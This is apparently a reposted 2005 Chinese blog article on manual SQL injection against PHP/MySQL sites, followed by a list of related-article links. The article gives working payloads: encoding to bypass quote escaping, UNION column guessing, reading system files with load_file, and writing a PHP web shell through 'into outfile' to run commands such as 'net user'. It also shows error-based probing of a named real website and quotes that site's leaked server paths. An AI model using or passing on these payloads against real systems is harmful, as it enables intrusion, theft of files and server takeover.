简述PHP注入的基本技巧

转载 2005年04月30日 02:08:00
PHP注入不象ASP那样有NBSI之类的超强工具,CASI毕竟功能太单一,其实知道他的注入原理后,完全可以实现手工注入。
    在php.ini中有一个配置选项magic_quotes_gpc=on/off当=ON时会把提交变量中的单引号,双引号,反斜线,空白字符前面加上反斜线变成转义字符,遇到这种情况,我们可以把提交语句用ASC或0X进行编码旧可以饶过了。有几个比较关键的语句,一是UNION,通过并运算查询当前表中字段,用与将多个SELECT语句的结果联合到一个结果集中,可以用它猜字段,EG:id=1234 and 1=2 union select 1,2,3,4...。猜出后会在相应地方出现数字对应。load_file()用来返回文件里的内容,注意的是要写明全文件路径和名称,EG:load_file('c:/boot.ini'),可以嵌入到UNION查询中,在相应的数字的位置上就会显示出你要得系统文件了。into outfile用来把表中内容写入文件,假设我们可以上传图片,上传后路径为:/upload/111.jpg,图片中的内容是一个很简单的系统变量<?phpsystem($cmd)?>,提交语句:id=1234 and 1=2 union select 1,2,load_file('d:/xxx/xxxx/down/upload/111.jpg'),4 into file'd:/xxx/xxxx/down/muma.php',接着我们去看http://www.xxx.com/down/muma.php?cmd=net user,就可以执行命令了,注意的是MYSQL5。0以下不支持AND连接两个表查询。
   有些站测试提交单引号就可以暴露很多信息是因为在php.ini中选项display_errors=on,会返回错误信息,象提交:http://www.shyau.com.tw/article.php?sid=140',结果呢?:Warning: Supplied argument is not a valid MySQL result resource in d:foxservwwwshyauincludessql_layer.php on line 230

Warning: Supplied argument is not a valid MySQL result resource in d:foxservwwwshyauincludessql_layer.php on line 230路径都出来了,晕。
   有时当提交单引号不能返回错误信息时,可以增加查询负值或改变查询类型,例如:id=1234我们可以提交:id=111111111111111111.....(因为边界检查不彻底)或id=ssss也有可能暴出敏感信息。
   mysql也有内置变量,version()返回当前数据库版本信息,database()返回当前数据库名,user(),system_user(),session_user()返回MYSQL用户名,可以帮助我们获得更多信息。这些都是很基础的东西,更多的技术还要大家自己发现,文章含盖并不全,有些资料细节往大家查询PHP中文手册。~~

[转]榨干 PHP,不得不转的一篇PHP使用技巧!

来源:http://www.phpchina.com/bbs/thread-13409-1-1.html这篇杂文翻译整理自网络各路文档资料(见最末的参考资料),尤其是 Ilia Alshanetsky...
  • heiyeshuwu
  • heiyeshuwu
  • 2007年01月26日 13:37
  • 8044

php 编程笔记分享 - 非常实用

php strstr 判断一个字符串是否存在于里一个字符串中 php stristr() 函数查找字符串在另一字符串中的第一次出现 php strchr() 函数查找字符串在另一字符串中的第一次出现 ...
  • wuxiaopeng_1986
  • wuxiaopeng_1986
  • 2016年05月27日 22:37
  • 571

Practical.PHP.and.MySQL(实用技巧)

  • 2010年04月26日 22:30
  • 6.24MB
  • 下载

PHP常用的一些屌炸天的技巧(一)

大部分有两三年工作经验的PHPer,都必定积累了不少在日常开发中使用的小技巧。从前端,接口开发,团队编程规范,模块化和前辈们分享的个人经验中总结出一些小技巧。这些技能都能大大地提高我们日常开发的效率,...
  • github_36670459
  • github_36670459
  • 2016年11月18日 01:12
  • 771

一些常用的PHP类库, 资源以及技巧

学习资源 PHP相关的有参考价值的社区,博客,网站,文章,书籍,视频等资源 PHP网站(PHP Websites) PHP The Right Way - 一个PHP实践的快...
  • keepfriend
  • keepfriend
  • 2017年08月15日 07:03
  • 504

PHP 常用函数 技巧方法集合 实例 运用篇

又到了综合篇,因为在笔记中看到了很多细碎的PHP函数运用技巧方法,所以整理下这一篇,供大家参考删除字符串中的空格和回车//删除空格和回车 function trimall($str){ $qi...
  • weixin_36333654
  • weixin_36333654
  • 2016年10月10日 15:36
  • 321

sqlmap注入用法

下载git clone git://github.com/sqlmapproject/sqlmap.git用法检查注入点sqlmap -u http://ooxx.com.tw/star_photo....
  • w786572258
  • w786572258
  • 2016年12月30日 14:26
  • 1841

搜索引擎的原理

一、 搜索引擎蜘蛛搜索引擎蜘蛛(spider),可简称为蜘蛛,本意为搜索引擎机器人(robot),称为蜘蛛的原因是将互联网比喻成蜘蛛网,将机器人比喻成了在网上爬行的蜘蛛,是搜索引擎自动抓取网页的程序。...
  • sunboy_2050
  • sunboy_2050
  • 2010年01月07日 16:05
  • 3841

深入理解PHP 高级技巧、面向对象与核心技术 原书第3版.pdf

  • 2017年07月18日 10:18
  • 149.98MB
  • 下载

PHP动态网站开发中常用的8个小技巧

PHP是一种用于创建动态WEB页面的服务端脚本语言。如同ASP和ColdFusion,用户可以混合使用PHP和HTML编写WEB页面,当访问者浏览到该页面时,服务端会首先对页面中的PHP命令进行处理,...
  • ddscorpio
  • ddscorpio
  • 2008年04月01日 22:26
  • 1211
内容举报
返回顶部
收藏助手
不良信息举报
您举报文章:简述PHP注入的基本技巧
举报原因:
原因补充:

(最多只允许输入30个字)